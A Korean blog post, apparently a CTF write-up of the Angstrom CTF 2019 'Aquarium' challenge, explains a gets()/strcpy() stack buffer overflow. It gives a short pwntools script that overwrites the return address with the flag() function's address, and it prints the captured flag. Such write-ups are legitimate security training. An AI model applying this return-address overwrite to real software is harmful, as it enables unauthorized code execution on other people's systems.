ii4gsp
Angstrom CTF 2019 - Aquarium 본문
간단한 문제이다.
main()함수에서 create_aquarium()함수를 호출한다.
create_aquarium()함수에서 scanf()함수로 6번 각 변수에 입력을받고 gets()함수로 변수 dest에 입력을받고, strcpy()함수로 dest에 입력한 내용을 src에 복사를 한다.
src를 오버플로우 일으켜 ret를 flag()함수로 조작하면 된다.
from pwn import *
p = remote('shell.actf.co', 19305)
e = ELF('/home/ii4gsp/aquarium')
flag = e.symbols['flag']
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
p.sendlineafter(': ', '1')
payload = ''
payload += '\x90' * 152
payload += p64(flag)
p.sendlineafter(': ', payload)
print p.recv()
Flag: actf{overflowed_more_than_just_a_fish_tank}
'시스템 해킹 > CTF' 카테고리의 다른 글
Angstrom CTF 2019 - Pie Shop (0) | 2020.03.04 |
---|---|
Angstrom CTF 2019 - Chain of Rope (0) | 2020.03.04 |
CSAW CTF 2018 Quals - get_it? (0) | 2020.03.03 |
CSAW CTF 2018 Quals - bigboy (0) | 2020.03.03 |
SSG_CTF - SimpleBOF (0) | 2020.02.25 |
Comments